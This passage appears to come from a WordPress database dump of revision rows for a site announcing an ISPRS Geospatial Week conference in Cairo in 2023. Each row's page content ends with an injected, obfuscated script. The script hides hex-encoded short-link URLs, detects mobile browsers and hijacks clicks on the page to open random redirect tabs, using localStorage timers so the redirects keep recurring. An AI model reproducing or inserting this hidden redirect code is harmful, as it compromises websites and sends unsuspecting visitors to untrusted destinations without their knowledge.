|kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 23:06:32','2022-11-08 23:06:32','',3066,'https://gsw2023.com/?p=3109',0,'revision','',0),
(3110,1,'2022-11-08 23:07:12','2022-11-08 23:07:12','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][ult_buttons btn_align=\"ubtn-center\" icon=\"fas fa-stream\" icon_size=\"32\" btn_icon_pos=\"ubtn-sep-icon-left-rev\"][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 23:07:12','2022-11-08 23:07:12','',3066,'https://gsw2023.com/?p=3110',0,'revision','',0),
(3111,1,'2022-11-08 23:08:07','2022-11-08 23:08:07','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt 